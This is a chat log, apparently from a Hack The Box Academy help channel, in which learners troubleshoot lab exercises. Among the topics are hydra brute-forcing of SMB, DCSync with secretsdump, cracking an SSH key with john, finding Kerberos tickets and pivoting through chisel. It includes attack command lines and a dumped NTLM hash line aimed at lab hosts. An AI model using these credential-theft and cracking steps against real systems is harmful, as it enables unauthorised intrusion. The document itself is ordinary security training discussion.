i have completed several of the beginning courses on a different source before finding HTB. was able to accomplish all tasks, find all the answers to any questions. but when its over i know what i did, but only the exact instance. are there any reccomendations for ways to practice with nmap and ssh. i feel like i need a few more practice examples to get concepts honed.
when you struggle but pass one lesson, and want more practice before moving to next step, are there places or ways you can run the simulations....for example, is it allowed to run countless nmap tests on various public domains? or do certain tests become too aggressive.

Totally More Hack the Box!

you can't just run scans against public domains without permission, that's illegal territory, just do some boxes if you don't want to do modules

Sorry for the late reply but there are a few ways you can do this, you can change the pass file that is being used by metasploit, you can also utilize nmap and do an ipmi-* for the script, which takes a while

Hi,

Im working on the password cracking htbacademy module, and have enumerated that there is a share called 'CASSIE'

hydra -l cassie -P password.list 10.129.202.136 smb

I have tried all variants of cassie but it doesn't seem to work, any tips?

anyone have an idea what could be happening here, when I ran this command

secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5

I'm getting this error message at the end of the command execution

inlanefreight.local\yousbaged58:1715:aad3b435b51404eeaad3b435b51404ee:8025d12232e66c0bf0c4dd76baed7f6d:::
[-] [Errno 104] Connection reset by peer
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...ls

10-4 thanks

I'm running command by command as is described in the module DCsync from AD Enum & Attack just replicating...

what is kiras id-rsa password trying to use mutated wordlist but get

john --wordlist=~/Desktop/mut_password.list ~/id_rsa
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)

when i go to open id_rsa it asks for password and kiras password doesnt work

is id_rsa a hash?

raceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'

run it with python2

how would i run it with python 2

python2 ssh2john.py

lol

ok i try

python 2 not found

install?

jesus christ

you need to edit the script and replace base64.decodestring with base64.decodebytes, which is the first answer you get on google for the error

or just run with py2 lol

I prefer this solution, you edit it once and never think about it again

john just wont do it

ssh.hashes] couldn't parse keyfile

python2 ssh2john.py ssh.private > ssh.hash

john --wordlist=~/Desktop/mut_password.list ~/Desktop/id_rsa1.txt
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)

bash: ssh1.txt: Permission denied

python2 ssh2john ~/Desktop/id_rsa1.txt > ssh1.hash
bash: ssh1.hash: Permission denied

nvrmnd i gotit

had to run ssh2john from john folder

sure it was that

I have a Question on mimkatz and the AD Skills assesments, last time I did this module (about a year ago) I was able to find cleartext creds with mimikatz at one point on the skills assessments both 1 and 2. This go around those same Fields show (null). I am perplexed as to why it showed cleartext password last time and not this time around. It is probably something simple I am missing or maybe a change... Anyone have an idea for this?

https://academy.hackthebox.com/achievement/1009496/89 - Feel good about this one

You should be using the mutated list

And doing -t 48 to speed it up

Also don't brute ssh with hydra

the mutated list I created in one of the previous sections?

Yes

From that point on, that's the wordlist for the module

On the shells and payloads live engagement I am confused about the Tomcat portion.

Where was that covered in the previous lessons?

You mean the .war?

Yeah, which module covered Tomcat? I'm trying to brush up on that section.

There's none that specifically covers tomcat

I found the answer another way, but I feel like I'm missing something.

Hmmm...

It's about research

So hacktricks probably?

When you visit tomcat manager you see it allows you to upload .war files

So you craft a payload around it

Yeah, I've used it before a couple months ago on another box, I was just confused because I didn't remember any HTB specific lesson on it thus far.

The closest is the msfvenom section

Yeah, I went back through that, it helped.

That teaches you about the tool

I'm pretty good with msfvenom, have some templates in my notes.

But tbh if they did a tomcat module, they'd have to do nginx, apache and others

That might be worthwhile, but I guess it's easier to just have people supplement with their own research. I'm just still working through trying to figure out what I should know from the HTB curriculum, and what I need to discover on my own.

The live engagement is all about research and crafting payloads based on it

Okay, thank you.

discover everything that isn't metioned

The skill assessments won't always be 1-1 to the section, if they told you about tomcat it wouldn't be much of a skill assessment would it

You'd just copy/paste the payload and not figure out why

I'm realizing that with some of the modules.

I forgot to switch my VPN to UDP like you mentioned, but it's slightly faster today.

Tcp is better

More reliable

You had mentioned yesterday that UDP might be faster, so I was going to try that but forgot.

I remember now, the Tomcat material I had was from my TryHackMe notes

When did I say UDP would be faster?

I actively advocate for people to use the tcp download

I guess you said "prefer" not faster

I misread what you said

so TCP is faster?

It's more stable

Stability > speed

Literally 99.9999% of issues people have with the rdp sections is bc udp

Good to know, glad I clarified, thanks!

And I say that bc (even without changing vpn regions) when people download and use the tcp one, they say their issue is resolved with the connection dropping

Is there any situation where UDP would be preferred in the case of a VPN?

cause there's always a chance it will cause some connection issues

Probably restrictions in more locked down countries

need help with this question . i have gotten into root but cant seem to smb client into dc01/linux01$. this is the question . "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)." is there something i am missing

Because root is not linux01$

ok so where am i going wrong

You need to find the ticket, perhaps using the tool from the section can help you find it

linikatz

Are you asking me or telling me

im asking

tbh the module tells you exactly where a machine account ticket can usually be found

this is all that shows for linux01$

You can't post screenshots

srry

Need to verify your main htb account following #welcome

I recommend going back to the section on finding kerberos tickets in Linux

Why are you apologizing?

said not to send screenshots

No, I said you can't

Literally

There's a difference

oh ok

i still cant figure this out

search for tickes

if you want to post screenshots, read and follow #welcome like Marcie said

find tickes besides linux01$

to find the correct ticket ^

the module gives you the exact location

julio carlos etc

Check all the directories given by the output

One of them is the daemon you see in realms info

/tmp# ls -al

then it shows users and some locations

Nope

Not in tmp

seriously, go back to the module

^

The tool shows tickets in more than just the /tmp directory

there's no need for a tool even or anything more than knowing the location, which is explicitly pointed out

why do i want to die when im doing machines

It's better to know the tool for practical engagements

tbh I don't remember what tool we're talking about

Just blind copying is what leads to not knowing what to do

you can find tickets with the find command and extract hashes with the python script, what else was there? 🤔

its asking for password

What happens if you just hit enter (no password)

Anonymous login successful
tree connect failed: NT_STATUS_BAD_NETWORK_NAME

Where is the 50064.rb in metasploit on the shells and payloads live engagement?

I've tried searching by noun name, searching by number, I even tried importing it and metasploit still cant find it.

The hint just says to use the "use" function...?

and have you tried using the use function?

I have to first find the module before I use it

so no

well you can definitely find it with searchsploit, but or just do what the hint says and type use number.rb

Yeah, I found it with searchsploit, but it's not in metasploit.

again, did you try the use function?

still cant log into lin01$

I did not

There is no number for me to use

I am expecting the one result so that I can "use 0"

Linux01$

And are you sure you're using the right ccache

did you see my comment above?

this one right here

Literally just do use 50064.rb

I didn't want to spell it out but there you go

Yeah that worked.

Thanks.

Why does that not come up in search?

Because the db hadn't been updated

I think you can run updatedb and it'd work

I did and it threw a bunch of errors

I even followed a walkthrough on how to manually upload the exploit

It's already there:^)

You could also, after using searchsploit, do locate 50064.rb

That was helpful, I was able to find it in a few spots.

One of them being the .msf*

I'm still just confused why I can't use the search function for it and "use 0"

It's what I've always done with metasploit

This is showing other ways to use Metasploit

So anything from searchsploit is done manually with "use <filename>" and anything searched within metasploit is done with the "use #" option?

Basically

You can even do use filename/path even if you can search it in Metasploit

Good to know, thanks!

in the attack common services module, assessment easy, there are 2 ways to get the flag. i got the flag via brute force and then the sqlmap command. whats the second method?

any clues

Hi can you help me with the last stage of the Q3 for this task, I am stufk after finding fiona's creds. can I DM you?

enumerate other services after you get the creds

I did login to mssql, found john as well which is impersonable, but hints say there should be a second imersonable account that I can't find, and I am stuck after finding Johns account, may I dm you with the steps I have undertaken?

john is the correct account to impersonate

think deeper or go back to the sql section to look for other ways to enumerate mssql

dm me if you still need help

Hi! i got stuck in password attacks Passwd, Shadow & Opasswd part. I basically did the whole thing, got the root hash and when i used hashcat with rockyou.txt the result was some kind of Vamos! thing. What am i missing? thank you

That's meaning it's exhausted, the password is in the list you created earlier in the module

thank you!

<@&861185840277487616>

Hmm

Sirg this isn't Google

it's hilarious that that part wasn't deleted lol

Hey Guys, I'm stuck on "Web Attacks - Skills Assessment",
I don't find the way to change the ||PHPSESSID so I can get the admin token|| can someone please give me a nudge

how can i compile a exploit on my system that works on target system

i dont think you can do anything with phpsessid

so how can I get the token???

search for IDOR

tell me if need help still

sqlmap ? 🤣

just ask

I'm trying to get the token, but there's something I missing ...
I can't get the admin token & I can't change the user phpsessid so I'm kinda stuck 😕

Everything you need to know should be in the module

Hello! Having troubles with proxychains because it doesnt resolve hostname: dc01.inlanefreight.htb Command:proxychains3 evil-winrm -i 172.16.1.15 -r inlanefreight.htb
Output:|DNS-response|: dc01.inlanefreight.htb does not exist Any help would be appreciated - thx

/etc/hosts: 172.16.1.15 inlanefreight inlanefreight.htb dc01 dc01.inlanefreight.htb

can you do nslookup dc01.inlanefreight.htb

No. Output: server can't find dc01.inlanefreight.htb: NXDOMAIN

strange

oh thats weird

Because the 172 is an internal ip only reachable through target machine

Order is 10.129.x.x is target -> 172.16.x.x internal network on target

I assume you have a pivot/proxy on the spawned target

If not, that's why

yes i have a reverse chisel tunnel running

proxy#R:127.0.0.1:1080=>socks: Listening

You have the chisel server running on your machine yeah?

yes

Also when you did nslookup did you do proxychains nslookup

yes

Weird I dont recall having many issues with this module, just followed step by step

Perhaps you're missing an intermediary host

what do you mean by intermediary host

But other than that not sure what elsr

A target between the spawned target and the one referenced in the question

need help?

@fathom pendant dont really understand what the intermediary host could be? sry

hows your proxychains setup?

The section would reference it

@sudden blaze can u cat ur proxychains.conf file

But also I'm 99% sure that .15 isn't the dc01

and grep for proxy_dns

This module doesn't go that in depth

ahh okay

And modifying /etc/hosts isn't required

[ProxyList]

add proxy here ...

meanwile

defaults set to "tor"

#socks4 127.0.0.1 9050
socks5 127.0.0.1 1080

Wrap it in triple backticks

Like this

# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4  127.0.0.1 9050
socks5  127.0.0.1 1080

what module is this so I can check my notes?

Pivoting port forwarding module

If I'm not mistaken

My notes on this module are mostly lacking but thats also because it was 99% just follow the steps

No stuck for days now on Module:Password Attacks Section:pass the ticket from linux optional exercises

Oh

It's optional

Just skip it

no

just wont it to function

You're gonna give yourself more headaches

Since most people did just skip the optional exercises

yeah, I did skip that part, so speculation would be all I can provide

They don't/won't have notes on them

@sudden blaze can you connect to the host directly without proxychains?

The 172? No

so like evil-winrm -i 172.16.1.15 -r inlanefreight.htb

ah right

It's an internal network to the lab

Evil win-rm is also just a pain in the ass

have you configured all the stuff with kerberos?

oh right i see you mentioned chisel

uhhh

i haven't really touched that before, but does the chisel server allow for dns configs then?

Tbh learn how to use Ligolo for proxies